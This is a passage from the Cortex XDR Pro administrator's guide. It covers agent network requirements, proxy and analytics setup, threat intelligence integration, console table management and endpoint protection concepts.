that initiate a TLS connection with Cortex, you must have the following certificates installed on
the operating system:

Certificate Fingerprint

GoDaddy Root • SHA1 Fingerprint—47 BE AB C9 22 EA E8 0E 78 78 34 62 A7

Certificate Authority - 9F 45 C2 54 FD E6 8B
G2 (Godaddy) • SHA256 Fingerprint—45 14 0B 32 47 EB 9C C8 C5 B4 F0 D7
B5 30 91 F7 32 92 08 9E 6E 5A 63 E2 74 9D D3 AC A9
19 8E DA

GoDaddy Class 2 Root • SHA1 Fingerprint—27 96 BA E6 3F 18 01 E2 77 26 1B A0 D7

Certification Authority 77 70 02 8F 20 EE E4
Certificate • SHA256 Fingerprint—C3 84 6B F2 4B 9E 93 CA 64 27 4C 0E
C6 7C 1E CC 5E 02 4F FC AC D2 D7 40 19 35 0E 81 FE
54 6A E4

52 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 Certificate Fingerprint

GlobalSign (Google) • SHA1 Fingerprint—75 E0 AB B6 13 85 12 27 1C 04 F8 5F DD

DE 38 E4 B7 24 2E FE
• SHA256 Fingerprint—CA 42 DD 41 74 5F D0 B8 1E B9 02 36
2C F9 D8 BF 71 9D A1 BD 1B 1E FC 94 6F 5B 4C 99 F4
2C 1B 9E

For the Cortex XDR agent 5.X release installed on

endpoints running a Windows version that does not
support SHA256 by default, you must install KB2868626
to establish a connection between Cortex XDR and the
agent. This applies to Windows Server 2003 R2 (32-bit)
(SP2 & later), Windows Server 2003 (32-bit) (SP2 & later),
Windows XP (32-bit) (SP3 & later), Windows Server 2008
(all editions; FIPS Mode), and Windows Vista (SP1 & later;
FIPS Mode).

STEP 4 | (Windows only) Enable access for Windows CRL checks.

(Endpoints running the following or later releases: Traps 6.0.3, Traps 6.1.1, and Cortex XDR 7.0 and
later) When the Cortex XDR agent examines portable executables (PEs) running on the endpoint as part
of the enforced Malware Security Profile, the agent performs a certificate revocation (CRL) check. The
CRL check ensures that the certificate used to sign a given PE is still considered valid by its Certificate
Authority (CA), and has not been revoked. To validate the certificate, the Cortex XDR agent leverages
Microsoft Windows APIs and triggers the operating system to fetch the specific Certificate Revocation
List (CRL) from the internet. To complete the certificate revocation check, the endpoint needs HTTP
access to a dynamic list of URLs, based on the PEs that are executed or scanned on the endpoint.
1. If a system-wide proxy is defined for the endpoint (statically or using a PAC file), Microsoft Windows
downloads the CRL lists through the proxy.
2. If a specific proxy is defined for the Cortex XDR agent, and the endpoint has no access to the
internet over HTTP, then Microsoft Windows will fail to download the CRL lists. As a result, the
certificate revocation check will fail and the certificate will be considered valid by the agent, while
creating a latency in executing PEs. If the Cortex XDR agent is running in an isolated environment
that prohibits the successful completion of certificate revocation checks, the Palo Alto Networks
Support team can provide a configuration file that will disable the revocation checks and avoid
unnecessary latency in the execution time of PEs.

STEP 5 | (Supported on Cortex XDR agent 7.0 or a later for Windows endpoints and Cortex XDR agent 7.3 or
later for Mac and Linux endpoints) Enable peer-to-peer (P2) content updates.
By default, the Cortex XDR agent retrieves content updates from its peer Cortex XDR agents on the
same subnet. To enable P2P, you must enable UDP and TCP over port 33221. You can change the port
number or choose to download the content directly from the Cortex XDR sever in the Agent settings
profile.

STEP 6 | Verify that you can access your Cortex XDR tenant.
After you download and install the Cortex XDR agent software on your endpoints and configure your
endpoint security policy, verify that the Cortex XDR agents can check in with Cortex XDR to receive the
endpoint policy.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 53
© 2020 Palo Alto Networks, Inc.
STEP 7 | If you use SSL decryption and experience difficulty in connecting the Cortex XDR agent to the
server, we recommend that you add the FQDNs required for access to your SSL Decryption
Exclusion list.
In PAN-OS 8.0 and later releases, you can configure the list in Device > Certificate Management > SSL
Decryption Exclusion.

Resources Required to Enable Access for Cortex XDR

To Enable Access to Cortex XDR components, you must allow access to various Palo Alto Networks
resources. If you use the specific Palo Alto Networks App-IDs indicated in the table, you do not need to
explicitly allow access to the resource. A dash (—) indicates there is no App-ID coverage for a resource. For
IP address ranges defined by GCP, see the following references:
• https://www.gstatic.com/ipranges/goog.json
• https://www.gstatic.com/ipranges/cloud.json

Some of the IP addresses required for access are registered in the United States. As a
result, some GeoIP databases do not correctly pinpoint the location in which IP addresses
are used. In regard to customer data, Cortex Data Lake stores all data in your deployment
region, regardless of the IP address registration and restricts data transmission through any
infrastructure to that region. For considerations, see Plan Your Cortex XDR Deployment.

Throughout this topic, <xdr-tenant> refers to the chosen subdomain of your Cortex XDR
tenant and <region> is the region in which your Cortex Data Lake is deployed (see Plan
Your Cortex XDR Deployment for supported regions).

FQDN IP Addresses and Port App-ID Coverage

distributions.traps.paloaltonetworks.com• IP address—35.223.6.69 traps-

Used for the first request in registration • Port—80 management-
service
flow where the agent passes the
distribution id and obtains the ch-<xdr-
tenant>.traps.paloaltonetworks.com of
its tenant

wss:// IP address by region: cortex-xdr

lrc-<region>.paloaltonetworks.com
• US—35.190.88.43
Used in live terminal flow. • EU—35.244.251.25
• CA—35.203.99.74
• UK—35.242.159.176
• JP—34.84.201.32
• SG—34.87.61.186
• AU—35.244.66.177
Port—443

panw-xdr-installers-prod- • IP ranges in GCP cortex-xdr

us.storage.googleapis.com • Port—443
Used to download installers for upgrade actions
from the server.

54 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
FQDN IP Addresses and Port App-ID Coverage
This storage bucket is used for all regions.

panw-xdr-payloads-prod- • IP ranges in GCP cortex-xdr

us.storage.googleapis.com • Port—443
Used to download the executable for live terminal
for Cortex XDR agents earlier than version 7.1.0.
This storage bucket is used for all regions.

global-content-profiles- • IP ranges in GCP cortex-xdr

policy.storage.googleapis.com • Port—443
Used to download content updates.

panw-xdr-evr- • IP ranges in GCP cortex-xdr

prod-<region>.storage.googleapis.com • Port—443
Used to download extended verdict request
results in scanning.

app- IP address by region: —

proxy.<region>.paloaltonetworks.com
• US—35.223.171.227
• EU— 34.90.29.180
• CA—35.203.84.164
• UK— 34.89.82.240
• JP—35.187.204.244
• SG— 35.247.128.12
• AU—35.189.54.120
Port—443

dc-<xdr- IP address by region: traps-

tenant>.traps.paloaltonetworks.com management-
• US—34.98.77.231
service
Used for EDR data upload. • EU—34.102.140.103
• CA—34.96.120.25
• UK—35.244.133.254
• JP—34.95.66.187
• SG—34.120.142.18
• AU—34.102.237.151
Port—443

ch-<xdr- IP address by region: traps-

tenant>.traps.paloaltonetworks.com management-
• US—34.98.77.231
service
Used for all other requests between the agent • EU—34.102.140.103
and its tenant server including heartbeat, uploads, • CA— 34.96.120.25
action results, and scan reports. • UK—35.244.133.254
• JP—34.95.66.187
• SG—34.120.142.18
• AU—34.102.237.151

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 55
© 2020 Palo Alto Networks, Inc.
 FQDN IP Addresses and Port App-ID Coverage
Port—443

api-<xdr- IP address by region: —

tenant>.xdr.<region>.paloaltonetworks.com
• US—35.222.81.194
Used for API requests and responses. • EU— 34.90.67.58
• CA—35.203.82.121
• UK— 34.89.56.78
• JP—34.84.125.129
• SG—34.87.83.144
• AU—35.189.18.208
Port—443

cc-<xdr- IP address by region: traps-

tenant>.traps.paloaltonetworks.com management-
• US—35.224.140.14
service
Used for get-verdict requests. • EU—2 34.90.71.103
• CA—35.203.35.23
• UK—34.89.42.214
• JP—34.84.225.105
• SG—35.247.161.94
• AU—35.201.23.188
Port—443

Broker VM Resources
Required for deployments that use Broker VM features

br-<xdr- IP address by region: —

tenant>.xdr.<region>.paloaltonetworks.com
• US—104.155.131.72
• EU— 34.91.128.226
• CA— 34.95.8.232
• UK—35.197.219.110
• JP— 34.85.74.43
• SG—34.87.167.125
• AU—35.244.93.0
Port—443

• time.google.com UDP port—123 —

• pool.ntp.org

App Login and Authentication

identity.paloaltonetworks.com • IP address— —
34.107.215.35
(SSO)
• Port—443

login.paloaltonetworks.com • IP address— —
34.107.190.184
(SSO)

56 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 FQDN IP Addresses and Port App-ID Coverage
• Port—443

In-App Help Center and Notifications

data.pendo.io Port—443 —

pendo- Port—443 —
static-5664029141630976.storage.googleapis.com

Proxy Communication
You can configure communication through proxy servers between the Cortex XDR server and the Cortex
XDR agents running on Windows, Mac, and Linux endpoints. The Cortex XDR agent uses the proxy settings
defined as part of the Internet & Network settings or WPAD protocol on the endpoint. You can also
configure a list of proxy servers that your Cortex XDR agent will use to communicate the with Cortex XDR
server.
Cortex XDR supports the following types of proxy configurations:
• System-wide proxy—Use system-wide proxy to send all communication on the endpoint including to and
from the Cortex XDR agent through a proxy server configured for the endpoint. Cortex XDR supports
proxy communication for proxy settings defined explicitly on the endpoint, as well as proxy settings
configured in a proxy auto-config (PAC) file.
• Application-specific proxy—(Available with Traps agent 5.0.9, Traps agent 6.1.2, and Cortex XDR agent
7.0 and later releases) Configure a Cortex XDR specific proxy that applies only to the Cortex XDR agent
and does not enforce proxy communications with other apps or services on your endpoint. You can
set up to five proxy servers either during the Cortex XDR agent installation process, or following agent
installation, directly from the Cortex XDR management console.
If the endpoints in your environment are not connected directly to the internet, you can deploy a Palo
Alto Networks broker VM.
Application-specific proxy configurations take precedence over system-wide proxy configurations. The
Cortex XDR agent retrieves the proxy list defined on the endpoint and tries to establish communication
with the Cortex XDR server first through app-specific proxies. Then, if communication is unsuccessful, the
agent tries to connect using the system-wide proxy, if defined. If none are defined, the Cortex XDR agent
attempts communication with the Cortex XDR server directly. The Cortex XDR agent does not support
proxy communication in environments where proxy authentication is required.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 57
© 2020 Palo Alto Networks, Inc.
Set up Network Analysis
With a Cortex XDR Pro per TB license you must set up your network sensors and define network coverage
for your internal networks.

STEP 1 | Set up your network sensors.

1. If you use unmanaged Palo Alto Networks firewalls, and did not configure log-forwarding on your
firewalls before activating Cortex XDR, Start Sending Logs to Cortex Data Lake.
2. (Optional) Set up External Data Ingestion.
If you have external (non-Palo Alto Networks) network sensors, you can set up a syslog collector
to receive alerts or logs from them. If you send external alerts, Cortex XDR can include any them in
relevant incidents for a more complete picture of the activity involved. If you send logs and alerts
from external sources such as Check Point firewalls, Cortex XDR can apply analytics analysis and
raise analytics alerts on the external logs and include the external alerts in incidents for additional
context.
3. (Optional) If you use a third-party authentication service, you can Ingest Authentication Logs and
Data into authentication stories. After you set up log collection, you can search for authentication
data using the Query Builder.
4. (Optional) If you want to use Pathfinder to examine unmanaged network hosts, servers, and
workstations for malicious or risky software, Activate Pathfinder.

STEP 2 | Configure the internal networks that you want Cortex XDR to monitor.
1. From the Cortex XDR management console, navigate to Assets > Network Configuration.
2. Define your IP Address Ranges.
This page provides a table of the IP address ranges Cortex XDR Analytics monitors, which is pre-
populated with the default IPv4 and IPv6 address spaces.
3. Define your Domain Names.

STEP 3 | If you use GlobalProtect or Prisma Access, add the GlobalProtect VPN IP address pool for the
VPN traffic that you want to monitor.
1. To enable the Cortex XDR app to analyze your VPN traffic, add (+) a new segment and specify the
first and last IP address of your GlobalProtect VPN IP address pool.
2. Identify this network segment as Reserved for VPN. GlobalProtect dynamically assigns IP addresses
from the IP pool to the mobile endpoints that connect to your network. The Cortex XDR analytics
engine creates virtual entity profiles for network segments that are reserved for VPN.
3. Save ( ) the network segment. If the Configuration saved notification does not appear, save again.

STEP 4 | If you selected a Directory Sync instance during the Cortex XDR activation process, configure
Cortex XDR to use it.

58 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Configure Cortex XDR
Before you can begin using Cortex XDR, you must set up your alert sensors. The more sensors that you
integrate with Cortex XDR, the more context you have when a threat is detected. You can also set up
Cortex XDR to raise Analytics alerts on network or endpoint data (or both) depending or your Cortex XDR
Pro licenses.
The following workflow highlights the tasks that you must perform (in order) to configure Cortex XDR.

STEP 1 | Integrate External Threat Intelligence Services.

Integrating external threat intelligence services enables you to view feeds from sources such as
AutoFocus and VirusTotal in the context of your incident investigation.

STEP 2 | After you activate Cortex XDR apps and services, wait 24 hours and then configure the Cortex
XDR analytics.
1. Specify the internal networks that you want Cortex XDR to monitor.
2. (Recommended) If you want to use Pathfinder to scan unmanaged endpoints, Activate Pathfinder.
3. Activate Cortex XDR - Analytics.
By default, Cortex XDR - Analytics is disabled. Activating Cortex XDR - Analytics enables the Cortex
XDR analytics engine to analyze your endpoint data to develop a baseline and raise Analytics and
Analytics BIOC alerts when anomalies and malicious behaviors are detected.
To create a baseline for enabling Analytics, Cortex XDR requires a minimum set of data; EDR logs
from at least 30 endpoints over a minimum of 2 weeks. Once this requirement is met, Cortex XDR
allows to enable analytics and begin triggering alerts within a few hours.
1.
In Cortex XDR, select the gear ( ) in the upper right corner and then select Settings > Cortex
XDR - Analytics.
The Enable option will be grayed out if you do not have the required data set.

2. When available, Enable Cortex XDR - Analytics. The analytics engine will immediately begin
analyzing your Cortex data for anomalies.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 59
© 2020 Palo Alto Networks, Inc.
 Creating a baseline can take up to 3 hours.

STEP 3 | Add an Alert Exclusion Policy.

STEP 4 | Manage Incident Starring.

STEP 5 | (Optional) Palo Alto Networks also automatically delivers behavioral indicators of compromise
(BIOCs) rules defined by the Palo Alto Networks threat research team to all Cortex XDR
tenants, but you can also import any additional indicators as rules, as needed.
To alert on specific BIOCs, Create a BIOC Rule. To immediately being alerting on known malicious
indicators of compromise (IOCs)—such as known malicious IP addresses—Create an IOC Rule.

Integrate External Threat Intelligence Services

To aid you with threat investigation, Cortex XDR displays the WildFire-issued verdict for each Key Artifact
in an incident. To provide additional verification sources, you can integrate an external threat intelligence
service with Cortex XDR. The threat intelligence services the app supports are:
• AutoFocus™—AutoFocus groups conditions and indicators related to a threat with a tag. Tags can
be user-defined or come from threat-research team publications and are divided into classes, such as
exploit, malware family, and malicious behavior. When you add the service, the relevant tags display in
the incident details page under Key Artifacts. Without an AutoFocus license key, you can still pivot from
Cortex XDR to the service to initiate a query for the artifact. See the AutoFocus Administrator’s Guide
for more information on AutoFocus tags.
• VirusTotal—VirusTotal provides aggregated results from over 70 antivirus scanners, domain services
included in the block list, and user contributions. The VirusTotal score is represented as a fraction,
where, for example, a score of 34/52 means out of 52 queried services, 34 services determined the
artifact to be malicious. When you add the service, the relevant VirusTotal score displays in the incident
details page under Key Artifacts. Without a VirusTotal license key, you can still pivot from Cortex XDR
to the service to initiate a query for the artifact.
• WildFire®—WildFire detects known and unknown threats, such as malware. The WildFire verdict
contains detailed insights into the behavior of identified threats. The WildFire verdict displays next to
relevant Key Artifacts in the incidents details page, the causality view, and within the Live Terminal view
of processes.

WildFire provides verdicts and analysis reports to Cortex XDR users without requiring a
license key. Using WildFire for next-generation firewalls or other use-cases continues to
require an active license.
Before you can view external threat intelligence in Cortex XDR incidents, you must obtain the license key
for the service and add it to the Cortex XDR Configuration. After you integrate any services, you will see
the verdict or verdict score when you Investigate Incidents.
To integrate an external threat intelligence service:

STEP 1 | Get your the API License Key for the service.
• Get your AutoFocus API key.
• Get your VirusTotal API key.

STEP 2 | Enter the license key in the Cortex XDR app.

60 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 Select the gear ( ) in the menu bar, then Settings > Threat Intelligence and then enter the license key.

STEP 3 | Test your license key.

Select Test. If there is an issue, an error message provides more details.

STEP 4 | Verify the service integration in an incident.

After adding the license key, you should see the additional verdict information from the service included
in the Key Artifacts of an incident. You can right-click the service, such as VirusTotal (VT) or AutoFocus
(AF), to see the entire verdict. See Investigate Incidents for more information on where these services
are used within the Cortex XDR app.

Set up Your Cortex XDR Environment

To create a more personalized user experience, Cortex XDR enables you to customize the following:
• Keyboard Shortcuts
• User Timezone
• Distribution List Emails
• Impersonation Role

Define Keyboard Shortcuts

Select the keyboard shortcut for the Cortex XDR capabilities.

STEP 1 |
From the Cortex XDR management console, navigate to > Settings > General.

STEP 2 | In the Keyboard Shortcuts section, change the default settings for:
• Artifact and Asset Views
• Quick Launcher
The shortcut value must be a keyboard letter, A through Z, and cannot be the same for both shortcuts.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 61
© 2020 Palo Alto Networks, Inc.
Select Timezone
Select your own specific timezone. Selecting a timezone affects the timestamps displayed in the Cortex
XDR management console, auditing logs, and when exporting files.

STEP 1 |
From the Cortex XDR management console, navigate to > Settings > General.

STEP 2 | In the Timezone section, select the timezone in which you want to display your Cortex XDR
data.

Define Distribution List Emails

Define a list of email addresses Cortex XDR can use as distribution lists. The defined email addresses are
used to send product maintenance, updates, and new version notifications. The email addresses are in
addition to e-mails registered with your CSP account.

STEP 1 |
From the Cortex XDR management console, navigate to > Settings > General.

STEP 2 | In the Email Contacts section, enter email addresses you want to include in a distribution list.
Make sure to select after each email address.

Impersonation Role
Define the type of role permissions granted to Palo Alto Networks Support team when opening support
tickets. By default, Palo Alto Networks Support is granted read-only access to your tenant.

STEP 1 |
From the Cortex XDR management console, navigate to > Settings > General.

STEP 2 | In the Impersonation Role section, define the level and duration of the permissions.
• Select one of the following Role permissions:
• Read-Only—Default setting, grants read only access to your tenant.
• Support related actions—Grants permissions to tech support file collection, dump file collection,
investigation query, BIOC and IOC rule editing, alert starring, exclusion and exception editing.
• Full role permissions—No limitations are applied, grants full permissions to all actions and content
on your tenant.
• Set the Permission Reset Timeframe.
If you selected Support related actions or Full role permissions in the Role field, set a specific
timeframe for how long these permissions are valid. Select either 7 Days, 30 Days, or No time
limitation.
We recommend that Role permissions are granted only for a specific timeframe, and full administrative
permissions is granted only when specifically requested by the support team.

62 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Set up Outbound Integration
With Cortex XDR, you can set up any of the following optional outbound integrations:
• Integrate Slack for Outbound Notifications
• Integrate a Syslog Receiver
• Integrate with Cortex XSOAR—Send alerts to Cortex XSOAR for automated and coordinated threat
response. From Cortex XSOAR, you define, adjust, and test playbooks that respond to Cortex XDR
alerts. You can also manage your incidents in Cortex XSOAR with any changes automatically synced to
Cortex XDR. For more information, see the in-app documentation in Cortex XSOAR.
• Integrate with external receivers such as ticketing systems—To manage incidents from the application
of your choice, you can use the Cortex XDR API Reference to send alerts and alert details to an external
receiver. After you generate your API key and set up the API to query Cortex XDR, external apps can
receive incident updates, request additional data about incidents, and make changes such as to set the
status and change the severity, or assign an owner. To get started, see the Cortex XDR API Reference.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 63
© 2020 Palo Alto Networks, Inc.
Use the Cortex XDR Interface
Cortex XDR provides an easy-to-use interface that you can access from the hub. By default, Cortex XDR
displays the Incident Management Dashboard when you log in. If desired, you can change the default
dashboard or Build a Custom Dashboard that displays when you log in.

Each SAML login session is valid for 8 hours.

Depending on your license and assigned role, you can explore and the following areas in the app.

Interface Description

Reporting From this menu, you can manage your dashboards and run
reports.

Investigation From this menu you can investigate a lead or hunt for threats.
You can access the Query Builder to search logs from your
Palo Alto Networks sensors, or the Query Center to view
the status of all queries, and Scheduled Queries to view the
status and modify the frequency of reoccurring queries.
You can also view all incidents, prioritize incidents, and set
alert exceptions.

Response From this menu, you can respond to identified threats and
take action. With a Cortex XDR Prevent or Cortex XDR Pro
per Endpoint license, you can view the Action Center where
you can initiate investigation and response actions such as
isolating an endpoint or initiating a live terminal session to
investigate processes and files locally.
From this menu, you can also add malicious domains and IP
addresses to an external dynamic list (EDL) enforceable on
your Palo Alto Networks firewall.

Endpoints With a Cortex XDR Prevent or Cortex XDR Pro per Endpoint
license, you can manage your endpoints and endpoint
security policy from this menu.

Security From this menu, you can configure additional add-on security
services such as Device Control. Device Control requires a
Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.

Rules With a Cortex XDR Pro per TB license, you can define
indicators of known threats to enable Cortex XDR to raise
alerts when detected. As you investigate and research threats
and uncover specific indicators and behaviors associated with

64 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
 Interface Description
a threat, you can create rules to detect and alert you when
the behavior occurs.

Add-ons With a Cortex XDR Pro license, you can access additional
Cortex XDR modules available for your tenant, such as Host
Insights.

Assets From this menu, you can define your network parameters and
view a list of all the assets in your network.

Open an in-context shortcut that you can use to search for

Quick Launcher
information,perform common investigation tasks, or initiate
response actions from any place in the Cortex XDR app

From the gear icon, you can view a log of actions initiated
Settings and management
by Cortex XDR analysts, configure Cortex XDR settings to
integrate with other apps and services, and manage settings
for the analytics engine.

View Cortex XDR notifications such as when a query

Notifications
completes.

User From the User, see who is logged into Cortex XDR. Right click
and select:
• About to view additional version and tenant ID
information.
• What’s New to view selected new features available for
your license type.
• Hide / Show Guide Center to toggle between displaying
the Guide Center icon.
• Log Out to terminate connection with your Cortex XDR
Management Console.

Hub Access a list of apps allocated to your hub account.

The following topics describe additional management actions you can perform on page results:
• Filter Page Results
• Save and Share Filters
• Show or Hide Results
• Manage Columns and Rows

Manage Tables
Most pages in Cortex XDR present data in table format and provide controls to help you manage and filter
the results. If additional views or actions are available for a specific value, you can pivot (right-click) from
the value in the table. For example, you can view the incident details, or pivot to the Causality View for an
alert or you can pivot to the results for a query.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 65
© 2020 Palo Alto Networks, Inc.
 On most pages, you can also refresh ( ) the content on the page.
To manage tables in the app:
• Filter Page Results
• Export Results to File
• Save and Share Filters
• Show or Hide Results
• Manage Columns and Rows

Filter Page Results

To reduce the number of results, you can filter by any heading and value. When you apply a filter, Cortex
XDR displays the filter criteria above the results table. You can also filter individual columns for specific
values using the icon to the right of the column heading.
Some fields also support additional operators such as =, !=, Contains, not Contains, *, !*.
There are three ways you can filter results:
• By column using the filter next to a field heading
• By building a filter query for one or more fields using the filter builder
• By pivoting from the contents of a cell (show or hide rows containing)
Filters are persistent. When you navigate away from the page and return, any filter you added remain
active.
To build a filter using one or more fields:

STEP 1 |
From a Cortex XDR page, select filter ( ).
Cortex XDR adds the filter criteria above the top of the table. For example, on the filter page:

STEP 2 | For each field you want to filter:

1. Select or search the field.
2. Select the operator by which to match the criteria.
In most cases this will be = to include results that match the value you specify, or != to exclude results
that match the value.
3. Enter a value to complete the filter criteria.

CMD fields have a 128 character limit. Shorten longer query strings to 127 characters
and add an asterisk (*).

Alternatively, you can select Include empty values to create a filter that excludes or includes results
when the field has an empty values.

66 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
STEP 3 | To add additional filters, click +AND (within the filter brackets) to display results that must
match all specified criteria, or +OR to display results that match any of the criteria.

STEP 4 | Click out of the filter area into the results table to see the results.

STEP 5 | Next steps:

• If at any time you want to remove the filter, click the X next to it. To remove all filters, click the trash
icon.
• Save and Share Filters.

Export Results to File

If needed, you can export the page results for most pages in Cortex XDR to a tab separated values (TSV)
file.

STEP 1 | (Optional) Filter Page Results to reduce the number of results for export.

STEP 2 | Select export to file ( ).

Cortex XDR exports any results matching your applied filters in TSV format. The TSV format requires a
tab separator, automatic detection does not work in case of multi-event exports.

Save and Share Filters

You can save and share filters across your organization.

• Save a filter:
Saved filters are listed on the Filters tab for the table layout and filter manager menu.
1. Save ( ) the active filter.
2. Enter a name to identify the filter.
You can create multiple filters with the same name. Saving a filter with an existing name will not
override the existing filter.
3. Choose whether to Share this filter or whether to keep it private for your own use only.

• Share a filter:
You can share a filter across your organization.
1. Select the table layout and filter menu indicated by the three vertical dots, then select Filters.

2. Select the filter to share and click the share icon.

3. If needed, you can later unshare ( ) or delete ( ) a filter.

Unsharing a filter will turn a public filter private. Deleting a shared filter will remove it for all users.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 67
© 2020 Palo Alto Networks, Inc.
Show or Hide Results
As an alternative to building a filter query from scratch or using the column filters, you can pivot from rows
and specific values to define the match criteria to fine tune the results in the table. You can also pivot on
empty values to show only results with empty values or only results that do not have empty values in the
column from which you pivot.

CMD fields are limited to 128 characters. If you pivot on a CMD field with a truncated value,
the app shows or hides all results that match the first 128 characters.

The show or hide action is a temporary means of filtering the results: If you navigate away from the page
and later return, any results you previously hid will appear again.
This option is available for fields which have a finite list of options.
To hide or show only results that match a specific field value:

STEP 1 | Right-click the matching field value by which you want to hide or show.

STEP 2 | Select the desired action:

• Hide rows with <field value>
• Show rows with <field value>
• Hide empty rows
• Show empty rows

Manage Columns and Rows

From Cortex XDR pages, you can manage how you want to view the results table and what information you
want XDR app to display.

• Adjust row height and column width

• Add or remove fields in the table
Any adjustments you make to the columns or rows persist when you navigate away from and later return to
the page.

• Adjust the row height and column width:

1. On the Cortex XDR page select the menu indicated by three vertical dots to the right of the filter
button.
2. In View Configuration, select the desired:
• Row height ranging from short to tall ( ).
• Column width ranging from narrow, fixed width, or scaled to the column heading ( ).

• Add or remove fields in the table:

68 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
1. On an Cortex XDR page, select the menu indicated by three vertical dots to the right of the filter
button.
2. Below the column manager, search for a column by name, or select the fields you want to add or
clear any fields you want to hide.
Cortex XDR adds or removes the fields to the table as you select or clear the fields.
3. If desired, drag and drop the fields to change the order in which they appear in the table.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 69
© 2020 Palo Alto Networks, Inc.
70 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
Endpoint Security
Endpoint security features require a Cortex XDR Pro - Endpoint license.

> Endpoint Security Concepts

> Manage Cortex XDR Agents
> Define Endpoint Groups
> About Content Updates
> Endpoint Security Profiles
> Customizable Agent Settings
> Apply Security Profiles to Endpoints
> Exceptions Security Profiles
> Hardened Endpoint Security

71
72 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security
© 2020 Palo Alto Networks, Inc.
Endpoint Security Concepts
• About Cortex XDR Endpoint Protection
• File Analysis and Protection Flow
• Endpoint Protection Capabilities
• Endpoint Protection Modules

About Cortex XDR Endpoint Protection

Cyberattacks are attacks performed on networks or endpoints to inflict damage, steal information, or
achieve other goals that involve taking control of computer systems that do not belong to the attackers.
These adversaries perpetrate cyberattacks either by causing a user to unintentionally run a malicious
executable file, known as malware, or by exploiting a weakness in a legitimate executable file to run
malicious code behind the scenes without the knowledge of the user.
One way to prevent these attacks is to identify executable files, dynamic-link libraries (DLLs), and other
pieces of code to determine if they are malicious and, if so, to prevent them from executing by testing each
potentially dangerous code module against a list of specific, known threat signatures. The weakness of this
method is that it is time-consuming for signature-based antivirus (AV) solutions to identify newly created
threats that are known only to the attacker (also known as zero-day attacks or exploits) and add them to the
lists of known threats, which leaves endpoints vulnerable until signatures are updated.
Cortex XDR takes a more efficient and effective approach to preventing attacks that eliminates the need for
traditional AV. Rather than try to keep up with the ever-growing list of known threats, Cortex XDR sets up a
series of roadblocks—traps, if you will—that prevent the attacks at their initial entry points—the point where
legitimate executable files are about to unknowingly allow malicious access to the system.
Cortex XDR provides a multi-method protection solution with exploit protection modules that target
software vulnerabilities in processes that open non-executable files and malware protection modules that
examine executable files, DLLs, and macros for malicious signatures and behavior. Using this multi-method
approach, the Cortex XDR solution can prevent all types of attacks, whether they are known or unknown
threats.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 73

© 2020 Palo Alto Networks, Inc.
Exploit Protection Overview
An exploit is a sequence of commands that takes advantage of a bug or vulnerability in a software
application or process. Attackers use these exploits to access and use a system to their advantage. To gain
control of a system, the attacker must exploit a chain of vulnerabilities in the system. Blocking any attempt
to exploit a vulnerability in the chain will block the entire exploitation attempt.
To combat an attack in which an attacker takes advantage of a software exploit or vulnerability, Cortex XDR
employs exploit protection modules (EPMs). Each EPM targets a specific type of exploit attack in the attack
chain. Some capabilities that Cortex XDR EPMs provide are reconnaissance prevention, memory corruption
prevention, code execution prevention, and kernel protection.

Malware Protection Overview

Malicious files, known as malware, are often disguised as or embedded in non-malicious files. These files
can attempt to gain control, gather sensitive information, or disrupt the normal operations of the system.
Cortex XDR prevents malware by employing the Malware Prevention Engine. This approach combines
several layers of protection to prevent both known and unknown malware that has not been seen before
from causing harm to your endpoints. The mitigation techniques that the Malware Prevention Engine
employs vary by the endpoint type:
• Malware Protection for Windows
• Malware Protection for Mac
• Malware Protection for Linux
• Malware Protection for Android
Malware Protection for Windows
• WildFire integration—Enables automatic detection of known malware and analysis of unknown malware
using WildFire threat intelligence.

74 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security

© 2020 Palo Alto Networks, Inc.
• Local static analysis—Enables Cortex XDR to use machine learning to analyze unknown files and issue a
verdict. Cortex XDR uses the verdict returned by the local analysis module until it receives a verdict from
Cortex XDR.
• DLL file protection—Enables Cortex XDR to block known and unknown DLLs on Windows endpoints.
• Office file protection—Enables Cortex XDR to block known and unknown macros when run from
Microsoft Office files on Windows endpoints.
• Behavioral threat protection (Windows 7 SP1 and later versions)—Enables continuous monitoring of
endpoint activity to identify and analyze chains of events—known as causality chains. This enables
